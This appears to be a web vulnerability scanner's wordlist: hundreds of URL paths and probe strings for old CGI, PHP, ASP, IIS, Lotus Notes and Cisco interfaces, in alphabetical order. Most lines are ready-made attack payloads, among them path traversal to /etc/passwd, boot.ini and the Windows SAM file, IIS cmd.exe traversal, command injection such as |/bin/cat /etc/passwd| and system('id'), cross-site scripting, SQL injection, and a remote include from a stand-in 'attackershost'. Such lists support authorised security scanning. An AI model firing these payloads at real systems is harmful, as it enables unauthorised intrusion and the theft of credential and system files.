forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_professionnel.asp?n=100
forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"
forums/
forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
foto/
fotos/
foxweb.dll
foxweb.exe
fpadmin/
fpdb/shop.mdb
fpsrvadm.exe
friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
ftp.pl
ftp/
ftpsh
functions.inc.php+
gH.cgi
gallery/captionator.php
gallery/errors/configmode.php
gallery/errors/needinit.php
gallery/errors/reconfigure.php
gallery/errors/unconfigured.php
gallery/index.php?include=../../../../../../../../../etc/passwd
gallery/search.php?searchstring=<script>alert(document.cookie)</script>
gb/index.php?login=true
gbadmin.cgi?action=change_adminpass
gbadmin.cgi?action=change_automail
gbadmin.cgi?action=colors
gbadmin.cgi?action=setup
gbook/gbook.cgi?_MAILTO=xx;ls
gbpass.pl
geeklog/users.php
general.chl+
generate.cgi?content=../../../../../../../../../../etc
generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
generate.cgi?content=../../../../../../../../../../windows
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
generate.cgi?content=../../../../../../../../../../winnt
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
get32.exe
get_od_toc.pl
getaccess
getdoc.cgi
gettransbitmap
gfx/
glimpse
global.asa
global.inc
global/
globals.jsa
globals.php3
globals.pl
gm-authors.cgi
gm-cplog.cgi
gm.cgi
goform/CheckLogin?login=root&password=tslinux
graphics/
group.nsf
groups.nsf
guest/
guestbook.cgi
guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
guestbook.pl
guestbook/
guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E
guestbook/admin.php
guestbook/admin/o12guest.mdb
guestbook/guestbook.html
guestbook/passwd
guests/
handler.cgi
hello.bat?&dir+c:\\
help.html
help.php?chapter=<script>alert('Vulnerable')</script>
help/contents.htm
help/domguide.nsf
help/dspug.nsf
help/help4.nsf
help/helpadmin.nsf
help/helplt4.nsf
help/home.html
help/internet.nsf
help/javapg.nsf
help/lccon.nsf
help/migrate.nsf
help/npn_admn.nsf
help/npn_rn.nsf
help/readmec.nsf
help/readmes.nsf
help/smhelp.nsf
help/srvinst.nsf
help4.nsf
help5_admin.nsf
help5_client.nsf
help5_designer.nsf
helpadmin.nsf
helperfunction.php
helplt4.nsf
hidden.nsf
hidden/
hit_tracker/
hitmatic/
hitmatic/analyse.cgi
hits.txt
hitview.cgi
home.php?arsc_language=elvish
home/
homebet/homebet.dll?form=menu&amp;option=menu-signin
homepage.nsf
homepage/
hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
horde/test.php
horde/test.php?mode=phpinfo
hostadmin/?page='
hostingcontroller/
hp-ux/
hp/device/this.LCDispatcher
hp_docs/
hp_docs/cgi-bin/index.cgi
hp_docs/xmltools/
hpnst.exe?c=p+i=SrvSystemInfo.html
hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
hsx.cgi?show=../../../../../../../../../../../passwd%00
ht_root/wwwroot/-/local/httpd$map.conf
htdocs/
htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
htgrep?file=index.html&hdr=/etc/passwd
htimage.exe
htimage.exe/path/filename?2,2
html/
html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
html/cgi-bin/cgicso?query=AAA
html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html2chtml.cgi
html2wml.cgi
htmlscript?../../../../../../../../../../etc
htmlscript?../../../../../../../../../../etc/passwd
htmltonuke.php
htpasswd
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
htsearch?-c/nonexistant
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
htsearch?exclude=%60/etc/passwd%60
https-admserv/bin/index?/<script>alert(document.cookie)</script>
hyperstat/stat_what.log
i?/etc/passwd
iNotes/Forms5.nsf
iNotes/Forms5.nsf/$DefaultNav
ibill.pm
ibill/
icat
icons/
idea/
idealbb/error.asp?|-|0|404_Object_Not_Found
ideas/
if/admin/nph-build.cgi
iisadmin/
iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
iisadmpwd/aexp2.htr
iisadmpwd/aexp2b.htr
iisadmpwd/aexp3.htr
iisadmpwd/aexp4.htr
iisadmpwd/aexp4b.htr
iishelp/iis/htm/tutorial/redirect.asp
iishelp/iis/misc/default.asp
iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
iissamples/exair/howitworks/Code.asp
iissamples/exair/howitworks/Codebrw1.asp
iissamples/exair/howitworks/Winmsdp.exe
iissamples/exair/howitworks/codebrws.asp
iissamples/exair/search/advsearch.asp
iissamples/exair/search/query.asp
iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/exair/search/search.asp
iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/SQLQHit.asp
iissamples/issamples/Winmsdp.exe
iissamples/issamples/codebrws.asp
iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/ixqlang.htm
iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/sqlqhit.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
iissamples/sdk/asp/docs/Winmsdp.exe
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
iissamples/sdk/asp/docs/codebrw2.asp
iissamples/sdk/asp/docs/codebrws.asp
ikonboard/help.cgi?
image/
imageFolio.cgi
imagefolio/admin/admin.cgi
imagemap
imagemap.exe
imagenes/
images/
images/?pattern=/etc/*&sort=name
img-sys/
img/
imgs/
imp/horde/test.php
imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
import/
impreso/
imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
inc/common.load.php
inc/config.php
inc/dbase.php
inc/sendmail.inc
include.php?path=contact.php&contact_email=\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;
include/customize.php
include/help.php
include/new-visitor.inc.php
includes/
includes/adovbs.inc
includes/footer.php3
includes/header.php3
incoming/
index.html%20
index.html.ca
index.html.cz.iso8859-2
index.html.de
index.html.dk
index.html.ee
index.html.el
index.html.en
index.html.es
index.html.et
index.html.fr
index.html.he.iso8859-8
index.html.hr.iso8859-2
index.html.it
index.html.ja.iso2022-jp
index.html.kr.iso2022-kr
index.html.ltz.utf8
index.html.lu.utf8
index.html.nl
index.html.nn
index.html.no
index.html.po.iso8859-2
index.html.pt
index.html.pt-br
index.html.ru.cp-1251
index.html.ru.cp866
index.html.ru.iso-ru
index.html.ru.koi8-r
index.html.ru.utf8
index.html.se
index.html.tw
index.html.tw.Big5
index.html.var
index.js0x70
index.jsp%00x
index.php/123
index.php/\"><script><script>alert(document.cookie)</script><
index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu
index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
index.php?IDAdmin=test
index.php?SqlQuery=test%20
index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script
index.php?action=storenew&username=<script>alert('Vulnerable')</script>
index.php?base=test%20
index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
index.php?dir=<script>alert('Vulnerable')</script>
index.php?download=/etc/passwd
index.php?download=/windows/win.ini
index.php?download=/winnt/win.ini
index.php?err=3&email=\"><script>alert(document.cookie)</script>
index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>
index.php?file=index.php
index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
index.php?module=My_eGallery
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
index.php?offset=[%20Problem%20Here%20]
index.php?option=search&searchword=<script>alert(document.cookie);</script>
index.php?page=../../../../../../../../../../boot.ini
index.php?page=../../../../../../../../../../etc/passwd
index.php?pymembs=admin
index.php?rep=<script>alert(document.cookie)</script>
index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
index.php?sql_debug=1
index.php?tampon=test%20
index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
index.php?vo=\"><script>alert(document.cookie);</script>
index.php?|=../../../../../../../../../etc/passwd
index.pl
info.php
info/
info2www
info2www '(../../../../../../../bin/mail root </etc/passwd>
informacion/
information/
infos/contact/index.asp
infos/faq/index.asp
infos/gen/index.asp
infos/services/index.asp
infosrch.cgi
ingresa/
ingreso/
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
instaboard/index.cfm
install/
install/install.php
instantwebmail/message.php
interchange/
internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
internal.sws?../../../../../../../../winnt/win.ini
internal/
internet.nsf
interscan/
interscan/cgi-bin/FtpSave.dll?I'm%20Here
intranet/
intranet/browse.php
invitado/
invitados/
invitefriends.php3
ion-p.exe?page=c:\winnt\repair\sam
ion-p?page=../../../../../etc/passwd
ip.txt
ipchat.php
isapi/count.pl?
isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
isapi/tstisapi.dll
isqlplus
isx.html
ixmail_netattach.php
j2ee/
jailshell
jamdb/
java-plugin/
java-sys/
java/
javadoc/
javapg.nsf
javax
jdbc/
jgb_eng_php3/cfooter.php3
jigsaw/
jj
job/
jotter.nsf
journal.cgi?folder=journal.cgi%00
jrun/
js
jservdocs/
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
jspdocs/
jsptest.jsp+
junk.aspx
k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
kbccv11.nsf
kbnv11.nsf
kbssvv11.nsf
kernel/class/delete.php
kernel/classes/ezrole.php
krysalis/
ksh
l_domlog.nsf
lastlines.cgi?process
launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica
launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
lccon.nsf
lcgi/lcgitest.nlm
lcgi/ndsobj.nlm
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
lcon.nsf
ldap.nsf
ldap.search.php3?ldap_serv=nonsense%20
ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>
leiadm.nsf
leilog.nsf
leivlt.nsf
level/16
level/16/exec/
level/16/exec/-///pwd
level/16/exec/-///show/configuration
level/16/exec//show
level/16/exec//show/access-lists
level/16/level/16/exec//show/configuration
level/16/level/16/exec//show/interfaces
level/16/level/16/exec//show/interfaces/status
level/16/level/16/exec//show/running-config/interface/FastEthernet
level/16/level/16/exec//show/version
level/17/exec//show
level/18/exec//show
level/19/exec//show
level/20/exec//show
level/21/exec//show
level/22/exec//show
level/23/exec//show
level/24/exec//show
level/25/exec//show
level/26/exec//show
level/27/exec//show
level/28/exec//show
level/29/exec//show
level/30/exec//show
level/31/exec//show
level/32/exec//show
level/33/exec//show
level/34/exec//show
level/35/exec//show
level/36/exec//show
level/37/exec//show
level/38/exec//show
level/39/exec//show
level/40/exec//show
level/41/exec//show
level/42/exec//show
level/42/exec/show%20conf
level/43/exec//show
level/44/exec//show
level/45/exec//show
level/46/exec//show
level/47/exec//show
level/48/exec//show
level/49/exec//show
level/50/exec//show
level/51/exec//show
level/52/exec//show
level/53/exec//show
level/54/exec//show
level/55/exec//show
level/56/exec//show
level/57/exec//show
level/58/exec//show
level/59/exec//show
level/60/exec//show
level/61/exec//show
level/62/exec//show
level/63/exec//show
level/64/exec//show
level/65/exec//show
level/66/exec//show
level/67/exec//show
level/68/exec//show
level/69/exec//show
level/70/exec//show
level/71/exec//show
level/72/exec//show
level/73/exec//show
level/74/exec//show
level/75/exec//show
level/76/exec//show
level/77/exec//show
level/78/exec//show
level/79/exec//show
level/80/exec//show
level/81/exec//show
level/82/exec//show
level/83/exec//show
level/84/exec//show
level/85/exec//show
level/86/exec//show
level/87/exec//show
level/88/exec//show
level/89/exec//show
level/90/exec//show
level/91/exec//show
level/92/exec//show
level/93/exec//show
level/94/exec//show
level/95/exec//show
level/96/exec//show
level/97/exec//show
level/98/exec//show
level/99/exec//show
lib/
library/
libro/
linux/
listrec.pl
livehelp/
livredor/index.php
loadpage.cgi?user_id=1&file=../../../../../../../../../../etc
loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
local/httpd$map.conf
localstart.asp
log-reader.cgi
log.htm
log.html
log.nsf
log.txt
log/
log/nether-log.pl?checkit
log4a.nsf
logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
logfile
logfile.htm
logfile.html
logfile.txt
logfile/
logfiles/
logger.html
logger/
logging/
logicworks.ini
login.cgi
login.jsp
login.php3?reason=chpass2%20
login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
login.pl
login.pl?course_id=\
login/
login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
logins.html
logit.cgi
logjam/showhits.php
logs.pl
logs.txt
logs/
logs/access_log
logs/error_log
logs/str_err.log
lookwho.cgi
lost+found/
lpt9
lpt9.xtp
ls
lsxlc.nsf
lwgate
lwgate.cgi
mab.nsf
magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc
mail
mail.box
mail/
mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com
mail/adminisist.nsf
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
mail/include.html
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
mail/settings.html
mail/src/read_body.php
mail1.box
mail10.box
mail2.box
mail3.box
mail4.box
mail5.box
mail6.box
mail7.box
mail8.box
mail9.box
mailform.exe
mailit.pl
maillist.cgi
maillist.pl
mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;
mailman/listinfo
mailman/listinfo/<script>alert('Vulnerable')</script>
mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
mailnews.cgi
mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
mailw46.nsf
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
main_page.php
majordomo.pl
mall_log_files/order.log
mambo/administrator/phpinfo.php
mambo/banners.php
mambo/index.php?Itemid=JUNK(5)
man.sh
man2html
manage/cgi/cgiproc
manage/login.asp+
manager/
manager/html-manager-howto.html
manager/manager-howto.html
mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
manual.php
manual/
manual/ag/esperfrm.htm
manual/images/
manual/servlets/scripts/servlet1/servform.htm
manual/servlets/scripts/shoes/shoeform.htm
market/
marketing/
master.password
mastergate/search.cgi?search=0&search_on=all
mbox
mc-icons/
mcartfree/database/metacart.mdb
megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
megabook/files/20/setup.db
members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
members/
members/ID.pm
members/ID.xbb
message/
messaging/
meta.pl
metacart/database/metacart.mdb
mgrqcgi
midicart.mdb
migrate.nsf
mini_logger.cgi
minimal.exe
ministats/admin.cgi
misc/
mkilog.exe
mkplog.exe
mkstats/
mlog.html
mlog.phtml
mmstdod.cgi
mod.php
mod_ose_docs
modif/delete.php
modif/ident.php
modif_infos.asp?n=%60/etc/passwd%60
modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
modif_infos.asp?n=../../../../../../../../../etc/passwd%00
modif_infos.asp?n=/....../boot.ini
modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
modif_infos.asp?n=/../../../../../../../../../etc/passwd
modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
modif_infos.asp?n=/etc/passwd
modif_infos.asp?n=/etc/passwd%00
modif_infos.asp?n=c:\boot.ini
mods/apage/apage.cgi?f=file.htm.|id|
modsecurity.php
modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
modules.php?name=Downloads&d_op=viewdownload
modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
modules.php?name=Members_List&sql_debug=1
modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?op=modload&name=0&file=0
modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
modules/Downloads/voteinclude.php+
modules/Forums/attachment.php
modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
modules/Search/index.php
modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
modules/WebChat/in.php+
modules/WebChat/out.php
modules/WebChat/quit.php
modules/WebChat/users.php
modules/Your_Account/navbar.php+
moin.cgi?test
mojo/mojo.cgi
moregroupware/modules/webmail2/inc/
movimientos/
mp3/
mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
mqseries/
mrtg.cfg?cfg=../../../../../../../../etc/passwd
mrtg.cgi?cfg=../../../../../../../../etc/passwd
mrtg.cgi?cfg=blah
ms_proxy_auth_query/
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
msadc/msadcs.dll
msadc/samples/adctest.asp
msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>
msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>
msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>
msdwda.nsf
mspress30/
msql/
msword/
mt-static/
mt-static/mt-check.cgi
mt-static/mt-load.cgi
mt-static/mt.cfg
mt/
mt/mt-check.cgi
mt/mt-load.cgi
mt/mt.cfg
mtatbls.nsf
mtdata/mtstore.nsf
mtstore.nsf
multihtml.pl?multi=/etc/passwd%00html
musicqueue.cgi
myguestBk/add1.asp?|-|0|404_Object_Not_Found
myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
myguestbook.cgi?action=view
myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
myinvoicer/config.inc
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
na_admin/
na_admin/ataglance.html
namazu.cgi
names.nsf
nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
nbmember.cgi?cmd=list_all_users
ncl_items.html
ncl_items.shtml?SUBJECT=1
ncommerce3/ExecMacro/macro.d2w/%0a%0a
ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
netauth.cgi?cmd=show&page=../../../../../../../../../../etc
netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
netbasic/websinfo.bas
netget?sid=Safety&amp;msg=2002&amp;file=Safety
